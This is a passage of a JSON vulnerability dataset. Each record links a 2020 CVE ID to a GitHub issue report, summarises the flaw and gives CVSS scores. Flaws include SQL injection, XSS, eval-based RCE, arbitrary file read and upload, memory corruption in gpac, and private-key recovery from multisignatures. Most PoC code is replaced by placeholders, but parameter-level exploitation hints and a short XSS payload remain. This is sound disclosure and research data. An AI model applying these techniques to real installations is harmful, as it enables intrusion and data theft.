  54545. "severity": "CRITICAL",
  54546. "baseScore": 9.8,
  54547. "impactScore": 5.9,
  54548. "exploitabilityScore": 3.9
  54549. },
  54550. {
  54551. "CVE_ID": "CVE-2020-22200",
  54552. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/2",
  54553. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/2",
  54554. "Repo_new": "blindkey/cve_like",
  54555. "Issue_Created_At": "2020-02-17T12:06:58Z",
  54556. "description": "PHPCMS NUMBERTAG public_get_suggest_keyword any file read. some think like this in honeypot get my attension . APITAG and i did some google ,found that in PHPCMS NUMBERTAG the file FILETAG q parame pass to file_get_content.. i do some more google ,and found that it still APITAG below. FILETAG",
  54557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  54558. "severity": "MEDIUM",
  54559. "baseScore": 5.3,
  54560. "impactScore": 1.4,
  54561. "exploitabilityScore": 3.9
  54562. },
  54563. {
  54564. "CVE_ID": "CVE-2020-22201",
  54565. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/4",
  54566. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/4",
  54567. "Repo_new": "blindkey/cve_like",
  54568. "Issue_Created_At": "2020-02-18T03:32:57Z",
  54569. "description": "phpcms NUMBERTAG FILETAG pagesize parameters RCE. phpcms NUMBERTAG in FILETAG FILETAG there is no filter before or after the pagesize value pass to $urlrules FILETAG and after template render ,we come to a function which will evaluate the data like below: FILETAG so the evalutate will trigger a arbitry command injection. poc like this: APITAG",
  54570. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  54571. "severity": "HIGH",
  54572. "baseScore": 8.8,
  54573. "impactScore": 5.9,
  54574. "exploitabilityScore": 2.8
  54575. },
  54576. {
  54577. "CVE_ID": "CVE-2020-22203",
  54578. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/6",
  54579. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/6",
  54580. "Repo_new": "blindkey/cve_like",
  54581. "Issue_Created_At": "2020-02-18T04:34:34Z",
  54582. "description": "phpcms NUMBERTAG FILETAG genre parameter sql inject. FILETAG FILETAG genre parameters pass to sql command without filter poc: CODETAG",
  54583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54584. "severity": "CRITICAL",
  54585. "baseScore": 9.8,
  54586. "impactScore": 5.9,
  54587. "exploitabilityScore": 3.9
  54588. },
  54589. {
  54590. "CVE_ID": "CVE-2020-22204",
  54591. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/7",
  54592. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/7",
  54593. "Repo_new": "blindkey/cve_like",
  54594. "Issue_Created_At": "2020-02-18T04:53:25Z",
  54595. "description": "ecshop NUMBERTAG FILETAG goods_number sql inject. ecshop NUMBERTAG FILETAG FILETAG flow_update_cart($_POST FILETAG use to make value as int ,but forget to do the same with key vars .. so leads to sql inject . hackers can do this like : CODETAG",
  54596. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54597. "severity": "CRITICAL",
  54598. "baseScore": 9.8,
  54599. "impactScore": 5.9,
  54600. "exploitabilityScore": 3.9
  54601. },
  54602. {
  54603. "CVE_ID": "CVE-2020-22205",
  54604. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/8",
  54605. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/8",
  54606. "Repo_new": "blindkey/cve_like",
  54607. "Issue_Created_At": "2020-02-18T05:24:17Z",
  54608. "description": "ecshop NUMBERTAG FILETAG id APITAG ecshop NUMBERTAG FILETAG FILETAG at line NUMBERTAG id was passe to execute without filter and leads to sql inject",
  54609. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54610. "severity": "CRITICAL",
  54611. "baseScore": 9.8,
  54612. "impactScore": 5.9,
  54613. "exploitabilityScore": 3.9
  54614. },
  54615. {
  54616. "CVE_ID": "CVE-2020-22206",
  54617. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/9",
  54618. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/9",
  54619. "Repo_new": "blindkey/cve_like",
  54620. "Issue_Created_At": "2020-02-18T05:36:12Z",
  54621. "description": "ecshop NUMBERTAG FILETAG aid SQL inject. FILETAG FILETAG auid parameters pass to sqladd without filter leads to sql inejct .",
  54622. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54623. "severity": "CRITICAL",
  54624. "baseScore": 9.8,
  54625. "impactScore": 5.9,
  54626. "exploitabilityScore": 3.9
  54627. },
  54628. {
  54629. "CVE_ID": "CVE-2020-22208",
  54630. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/10",
  54631. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/10",
  54632. "Repo_new": "blindkey/cve_like",
  54633. "Issue_Created_At": "2020-02-18T12:35:38Z",
  54634. "description": "NUMBERTAG cms NUMBERTAG FILETAG x APITAG . PATHTAG FILETAG $alphabet=trim($_GET['x']); and then $alphabet has been pass to sql without filter so leads to sql inject poc like : ERRORTAG",
  54635. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54636. "severity": "CRITICAL",
  54637. "baseScore": 9.8,
  54638. "impactScore": 5.9,
  54639. "exploitabilityScore": 3.9
  54640. },
  54641. {
  54642. "CVE_ID": "CVE-2020-22209",
  54643. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/12",
  54644. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/12",
  54645. "Repo_new": "blindkey/cve_like",
  54646. "Issue_Created_At": "2020-02-18T12:44:54Z",
  54647. "description": "NUMBERTAG cms NUMBERTAG ajax_common query SQL inject . FILETAG FILETAG $_GET['query'] pass to $gbk_query and then $gbk_query get iconv so use some special word to do something with iconv ,like wide charactars( such as NUMBERTAG c NUMBERTAG chinese word or some thing . and then get into sql and finally leads to sql inject . poc: ERRORTAG",
  54648. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54649. "severity": "CRITICAL",
  54650. "baseScore": 9.8,
  54651. "impactScore": 5.9,
  54652. "exploitabilityScore": 3.9
  54653. },
  54654. {
  54655. "CVE_ID": "CVE-2020-22210",
  54656. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/11",
  54657. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/11",
  54658. "Repo_new": "blindkey/cve_like",
  54659. "Issue_Created_At": "2020-02-18T12:38:29Z",
  54660. "description": "NUMBERTAG cms NUMBERTAG FILETAG x SQL inject . PATHTAG FILETAG exactly the same as what happend to FILETAG x pass to alphabet and get in within a sql expression without filter ,so leads to sql inject poc the same : ERRORTAG",
  54661. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54662. "severity": "CRITICAL",
  54663. "baseScore": 9.8,
  54664. "impactScore": 5.9,
  54665. "exploitabilityScore": 3.9
  54666. },
  54667. {
  54668. "CVE_ID": "CVE-2020-22211",
  54669. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/13",
  54670. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/13",
  54671. "Repo_new": "blindkey/cve_like",
  54672. "Issue_Created_At": "2020-02-18T12:49:10Z",
  54673. "description": "NUMBERTAG cms FILETAG key SQL inject . quite like the one URLTAG look at the file with the act = \"key\" below FILETAG $keys just get iconv and then pass to the sql ,and finally leads to sql inject .. poc: ERRORTAG",
  54674. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54675. "severity": "CRITICAL",
  54676. "baseScore": 9.8,
  54677. "impactScore": 5.9,
  54678. "exploitabilityScore": 3.9
  54679. },
  54680. {
  54681. "CVE_ID": "CVE-2020-22212",
  54682. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/14",
  54683. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/14",
  54684. "Repo_new": "blindkey/cve_like",
  54685. "Issue_Created_At": "2020-02-18T12:57:08Z",
  54686. "description": "NUMBERTAG cms NUMBERTAG FILETAG id SQL inject . in file FILETAG FILETAG $smarty APITAG id was direcly pass to sql expression and finally leads to sql inject .",
  54687. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54688. "severity": "CRITICAL",
  54689. "baseScore": 9.8,
  54690. "impactScore": 5.9,
  54691. "exploitabilityScore": 3.9
  54692. },
  54693. {
  54694. "CVE_ID": "CVE-2020-22251",
  54695. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/660",
  54696. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/660",
  54697. "Repo_new": "phplist/phplist3",
  54698. "Issue_Created_At": "2020-05-18T16:59:44Z",
  54699. "description": "XSS vulnerability in version NUMBERTAG and lower. XSS vulnerability exists in admin page while adding a new administrator in the Login name field. Steps to Reproduce NUMBERTAG Login as administrator NUMBERTAG Navigate to the APITAG administrators\" under config NUMBERTAG Click on APITAG new admin NUMBERTAG Inject the payload in the Login name field Payload: APITAG alert NUMBERTAG APITAG NUMBERTAG Enter any other required details and click on APITAG changes\" POC: FILETAG",
  54700. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  54701. "severity": "MEDIUM",
  54702. "baseScore": 4.8,
  54703. "impactScore": 2.7,
  54704. "exploitabilityScore": 1.7
  54705. },
  54706. {
  54707. "CVE_ID": "CVE-2020-22312",
  54708. "Issue_Url_old": "https://github.com/wlx65003/HZNUOJ/issues/17",
  54709. "Issue_Url_new": "https://github.com/lixin-wei/hznuoj/issues/17",
  54710. "Repo_new": "lixin-wei/hznuoj",
  54711. "Issue_Created_At": "2020-02-25T08:32:50Z",
  54712. "description": "Strict SQL filtering leads to xss injection vulnerability. description The code problem occurred in APITAG . The APITAG in the output form was obtained from the database. There was no filtering of angle brackets \u201c APITAG \u201d during registration, which caused the reorganization here. xss injection FILETAG Attack process CODETAG FILETAG Then visit APITAG , set the APITAG to soft NUMBERTAG and click submit FILETAG the attack works FILETAG poc APITAG",
  54713. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54714. "severity": "MEDIUM",
  54715. "baseScore": 6.1,
  54716. "impactScore": 2.7,
  54717. "exploitabilityScore": 2.8
  54718. },
  54719. {
  54720. "CVE_ID": "CVE-2020-22330",
  54721. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/850",
  54722. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/850",
  54723. "Repo_new": "intelliants/subrion",
  54724. "Issue_Created_At": "2019-12-18T06:59:25Z",
  54725. "description": "Possible Cross site scripting (XSS) . SCOPE: Package: Subrion CMS Version NUMBERTAG ISSUE: XSS Vulnerability Description: The software does not neutralize or incorrectly neutralizes user controllable input before it is placed in output that is used as a web page that is served to other users. As a result, an attacker can inject and execute arbitrary HTML and script code in user's browser in context of a vulnerable website. Vulnerability Classification: CWE NUMBERTAG APITAG NUMBERTAG CVSS NUMBERTAG PATHTAG Steps To Reproduce: Login Click on contents APITAG APITAG page APITAG Fill the details APITAG In title give the payload APITAG APITAG Now click on blocks while adding a new block XSS is being triggered. APITAG Reference: CVETAG Mitigations: Perform sanitation of input data before inserting it into the page content. Escaping user input. Validating user input.",
  54726. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54727. "severity": "MEDIUM",
  54728. "baseScore": 6.1,
  54729. "impactScore": 2.7,
  54730. "exploitabilityScore": 2.8
  54731. },
  54732. {
  54733. "CVE_ID": "CVE-2020-22352",
  54734. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1423",
  54735. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1423",
  54736. "Repo_new": "gpac/gpac",
  54737. "Issue_Created_At": "2020-03-01T19:19:26Z",
  54738. "description": "APITAG NULL pointer dereference in APITAG in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Thanks dr3dd",
  54739. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54740. "severity": "MEDIUM",
  54741. "baseScore": 5.5,
  54742. "impactScore": 3.6,
  54743. "exploitabilityScore": 1.8
  54744. },
  54745. {
  54746. "CVE_ID": "CVE-2020-22392",
  54747. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/868",
  54748. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/868",
  54749. "Repo_new": "intelliants/subrion",
  54750. "Issue_Created_At": "2020-03-05T02:55:23Z",
  54751. "description": "Blog Stored XSS Vulnerability. Hello,I found a stored xss bug when add blog. At first add a blog and upload image ,then edit APITAG file \u201dx\u201d onerror=\u201dalert(/xss/). Browse blog trigger XSS. Suggestion call APITAG to image FILETAG FILETAG",
  54752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54753. "severity": "MEDIUM",
  54754. "baseScore": 5.4,
  54755. "impactScore": 2.7,
  54756. "exploitabilityScore": 2.3
  54757. },
  54758. {
  54759. "CVE_ID": "CVE-2020-22394",
  54760. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/42",
  54761. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/42",
  54762. "Repo_new": "yzmcms/yzmcms",
  54763. "Issue_Created_At": "2020-03-04T11:56:13Z",
  54764. "description": "XSS vulnerability exists in member submission function. \u4f1a\u5458\u6295\u7a3f\u529f\u80fd\uff0c\u4f7f\u7528\u5982\u4e0bpayload\u5373\u53ef\u9020\u6210xss APITAG APITAG APITAG FILETAG \u6211\u5728\u5b98\u65b9\u6f14\u793a\u7ad9\u6295\u7a3f\u4e86\u4e00\u4e2a\u6587\u7ae0\uff0cid NUMBERTAG",
  54765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54766. "severity": "MEDIUM",
  54767. "baseScore": 6.1,
  54768. "impactScore": 2.7,
  54769. "exploitabilityScore": 2.8
  54770. },
  54771. {
  54772. "CVE_ID": "CVE-2020-22481",
  54773. "Issue_Url_old": "https://github.com/hacklcx/HFish/issues/69",
  54774. "Issue_Url_new": "https://github.com/hacklcx/hfish/issues/69",
  54775. "Repo_new": "hacklcx/hfish",
  54776. "Issue_Created_At": "2020-03-15T05:35:23Z",
  54777. "description": "XSS exists in the information,can get cookie. In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks. FILETAG Use the following code to get a cookie. ERRORTAG FILETAG",
  54778. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54779. "severity": "MEDIUM",
  54780. "baseScore": 6.1,
  54781. "impactScore": 2.7,
  54782. "exploitabilityScore": 2.8
  54783. },
  54784. {
  54785. "CVE_ID": "CVE-2020-22535",
  54786. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/5",
  54787. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/5",
  54788. "Repo_new": "pbootcms/pbootcms",
  54789. "Issue_Created_At": "2020-03-20T12:37:57Z",
  54790. "description": "Pbootcms NUMBERTAG has a management background arbitrary file download vulnerability. The vulnerability lies in the update function of the FILETAG file. In this function, the 'list' variable is spliced into the path without filtering, so any file can be copied under the '/ backup / upgrade /' path, and then the file can be downloaded by directly accessing the file. APITAG in to the / FILETAG page. FILETAG APITAG the '/ pbootcms / Admin. PHP? P = / upgrade / update' to request that the contents of the list point to the file to be downloaded FILETAG APITAG visit '\\ pbootcms \\ static \\ backup \\ extensions \\ APITAG \\ conf \\ nginx. Conf' to download to the file FILETAG code FILETAG The filtering of 'list' is not strict.",
  54791. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  54792. "severity": "MEDIUM",
  54793. "baseScore": 6.5,
  54794. "impactScore": 3.6,
  54795. "exploitabilityScore": 2.8
  54796. },
  54797. {
  54798. "CVE_ID": "CVE-2020-22643",
  54799. "Issue_Url_old": "https://github.com/liufee/cms/issues/51",
  54800. "Issue_Url_new": "https://github.com/liufee/cms/issues/51",
  54801. "Repo_new": "liufee/cms",
  54802. "Issue_Created_At": "2020-03-27T10:09:42Z",
  54803. "description": "\u540e\u53f0\u5934\u50cf\u7ba1\u7406\u6a21\u5757\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20getshell NUMBERTAG The administrator will use the APITAG function in the PATHTAG file to modify the avatar. This function will call Util's APITAG function FILETAG NUMBERTAG We continue to use the APITAG function to find that the function directly calls the upload function without filtering the file name. FILETAG NUMBERTAG We followed up the APITAG function and found that the temporary file was directly moved to an undetected file name. FILETAG NUMBERTAG ulnerability verification FILETAG FILETAG FILETAG FILETAG",
  54804. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  54805. "severity": "HIGH",
  54806. "baseScore": 7.2,
  54807. "impactScore": 5.9,
  54808. "exploitabilityScore": 1.2
  54809. },
  54810. {
  54811. "CVE_ID": "CVE-2020-22650",
  54812. "Issue_Url_old": "https://github.com/jpalanco/alienvault-ossim/issues/4",
  54813. "Issue_Url_new": "https://github.com/jpalanco/alienvault-ossim/issues/4",
  54814. "Repo_new": "jpalanco/alienvault-ossim",
  54815. "Issue_Created_At": "2020-03-27T02:27:37Z",
  54816. "description": "A memory leak Vulnerability. I discovered the memory leak vulnerability on NUMBERTAG th lines in file sim organizer.c. The memory allocated the function APITAG is not freed\uff0cbefore the function sim_event_unref (event) is called. As well as event >backlog_id is the member of the structure event. So when lots of alarm events occurs, increasing memory usage can cause system crash.",
  54817. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  54818. "severity": "HIGH",
  54819. "baseScore": 7.5,
  54820. "impactScore": 3.6,
  54821. "exploitabilityScore": 3.9
  54822. },
  54823. {
  54824. "CVE_ID": "CVE-2020-22673",
  54825. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1342",
  54826. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1342",
  54827. "Repo_new": "gpac/gpac",
  54828. "Issue_Created_At": "2019-11-13T04:06:43Z",
  54829. "description": "There are memory leaks in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code_drm.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG memleak senc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  54830. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54831. "severity": "MEDIUM",
  54832. "baseScore": 5.5,
  54833. "impactScore": 3.6,
  54834. "exploitabilityScore": 1.8
  54835. },
  54836. {
  54837. "CVE_ID": "CVE-2020-22674",
  54838. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1346",
  54839. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1346",
  54840. "Repo_new": "gpac/gpac",
  54841. "Issue_Created_At": "2019-11-13T07:15:54Z",
  54842. "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in isom_intern.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG invalid APITAG URLTAG The ASAN information is as follows: ERRORTAG",
  54843. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54844. "severity": "MEDIUM",
  54845. "baseScore": 5.5,
  54846. "impactScore": 3.6,
  54847. "exploitabilityScore": 1.8
  54848. },
  54849. {
  54850. "CVE_ID": "CVE-2020-22675",
  54851. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1344",
  54852. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1344",
  54853. "Repo_new": "gpac/gpac",
  54854. "Issue_Created_At": "2019-11-13T05:18:43Z",
  54855. "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in stbl_read.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc APITAG heap URLTAG The ASAN information is as follows: ERRORTAG",
  54856. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54857. "severity": "MEDIUM",
  54858. "baseScore": 5.5,
  54859. "impactScore": 3.6,
  54860. "exploitabilityScore": 1.8
  54861. },
  54862. {
  54863. "CVE_ID": "CVE-2020-22677",
  54864. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1341",
  54865. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1341",
  54866. "Repo_new": "gpac/gpac",
  54867. "Issue_Created_At": "2019-11-13T03:49:59Z",
  54868. "description": "There is a heap buffer overflow in the dump_data_hex function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_dump.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG heep dump_data NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  54869. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54870. "severity": "MEDIUM",
  54871. "baseScore": 5.5,
  54872. "impactScore": 3.6,
  54873. "exploitabilityScore": 1.8
  54874. },
  54875. {
  54876. "CVE_ID": "CVE-2020-22678",
  54877. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1339",
  54878. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1339",
  54879. "Repo_new": "gpac/gpac",
  54880. "Issue_Created_At": "2019-11-13T03:14:38Z",
  54881. "description": "There is a heap buffer overflow in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in av_parsers.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG stackoverflow APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  54882. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54883. "severity": "MEDIUM",
  54884. "baseScore": 5.5,
  54885. "impactScore": 3.6,
  54886. "exploitabilityScore": 1.8
  54887. },
  54888. {
  54889. "CVE_ID": "CVE-2020-22679",
  54890. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1345",
  54891. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1345",
  54892. "Repo_new": "gpac/gpac",
  54893. "Issue_Created_At": "2019-11-13T05:25:14Z",
  54894. "description": "There are memory leaks in the sgpd_parse_entry function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code_base.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG memleak sgpd_parse_entry URLTAG The ASAN information is as follows: ERRORTAG",
  54895. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54896. "severity": "MEDIUM",
  54897. "baseScore": 5.5,
  54898. "impactScore": 3.6,
  54899. "exploitabilityScore": 1.8
  54900. },
  54901. {
  54902. "CVE_ID": "CVE-2020-22741",
  54903. "Issue_Url_old": "https://github.com/xuperchain/xuperchain/issues/782",
  54904. "Issue_Url_new": "https://github.com/xuperchain/xuperchain/issues/782",
  54905. "Repo_new": "xuperchain/xuperchain",
  54906. "Issue_Created_At": "2020-04-07T05:11:12Z",
  54907. "description": "one can recover other's private key using multi signature. Brief of the issue One can recover other's private key after collecting other's partial signature in multisignature . logic CODETAG The one who proposal a multisignature knows APITAG he get a partial signature(eg. s2), he can recover corresponding sk2 using \"sk2=(s2 k2)/H(PK,R,m)\". Repo steps NUMBERTAG create contract account CODETAG private keys CODETAG NUMBERTAG generate multisignature transaction CODETAG CODETAG NUMBERTAG collect partial siganture CODETAG NUMBERTAG caculate hash of transactions ERRORTAG NUMBERTAG recover private key ERRORTAG run exploit.go CODETAG Additional information I think no one round multisignature is proven security based schnorr APITAG to BLS signature or just use plain multi signature.",
  54908. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  54909. "severity": "HIGH",
  54910. "baseScore": 7.5,
  54911. "impactScore": 3.6,
  54912. "exploitabilityScore": 3.9
  54913. },
  54914. {
  54915. "CVE_ID": "CVE-2020-22761",
  54916. "Issue_Url_old": "https://github.com/flatpressblog/flatpress/issues/64",
  54917. "Issue_Url_new": "https://github.com/flatpressblog/flatpress/issues/64",
  54918. "Repo_new": "flatpressblog/flatpress",
  54919. "Issue_Created_At": "2020-04-19T13:44:03Z",
  54920. "description": "Security Issue: CSRF in APITAG function.. In the source code, the APITAG function is sent via unauthenticated GET method. ( PATHTAG APITAG APITAG APITAG APITAG APITAG The application does not have anti csrf tokens, so it is vulnerable to Cross site Request Forgery attacks. The vulnerability allows delete any file.",
  54921. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54922. "severity": "HIGH",
  54923. "baseScore": 8.8,
  54924. "impactScore": 5.9,
  54925. "exploitabilityScore": 2.8
  54926. },
  54927. {
  54928. "CVE_ID": "CVE-2020-22781",
  54929. "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3502",
  54930. "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3502",
  54931. "Repo_new": "ether/etherpad-lite",
  54932. "Issue_Created_At": "2018-10-23T16:32:13Z",
  54933. "description": "SQL injection attempts killls Etherpad lite. Hi, On our server we were getting some Etherpad outage. We relied it to a nasty query: ERRORTAG A \"minimal\" query example: ERRORTAG This provoke an immediate crash: ERRORTAG We are running the NUMBERTAG flavor on Debian Stretch with node NUMBERTAG and no specific customization. We reproduced the behavior on two independents Etherpad installation.",
  54934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  54935. "severity": "HIGH",
  54936. "baseScore": 7.5,
  54937. "impactScore": 3.6,
  54938. "exploitabilityScore": 3.9
  54939. },
  54940. {
  54941. "CVE_ID": "CVE-2020-22782",
  54942. "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3825",
  54943. "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3825",
  54944. "Repo_new": "ether/etherpad-lite",
  54945. "Issue_Created_At": "2020-04-02T18:51:03Z",
  54946. "description": "aborted uploads crash instance?. ERRORTAG Using soffice APITAG Develop branch",
  54947. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  54948. "severity": "HIGH",
  54949. "baseScore": 7.5,
  54950. "impactScore": 3.6,
  54951. "exploitabilityScore": 3.9
  54952. },
  54953. {
  54954. "CVE_ID": "CVE-2020-22808",
  54955. "Issue_Url_old": "https://github.com/fecshop/yii2_fecshop/issues/87",
  54956. "Issue_Url_new": "https://github.com/fecshop/yii2_fecshop/issues/87",
  54957. "Repo_new": "fecshop/yii2_fecshop",
  54958. "Issue_Created_At": "2020-05-20T08:59:08Z",
  54959. "description": "Xss vulnerability. Hi, this is Xcheck team. Our code safety check tool Xcheck has found NUMBERTAG ss vulnerabilities in this object. Here are the detail NUMBERTAG PATHTAG line NUMBERTAG APITAG NUMBERTAG PATHTAG line NUMBERTAG APITAG You can visit this url to verify. APITAG",
  54960. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54961. "severity": "MEDIUM",
  54962. "baseScore": 6.1,
  54963. "impactScore": 2.7,
  54964. "exploitabilityScore": 2.8
  54965. },
  54966. {
  54967. "CVE_ID": "CVE-2020-22840",
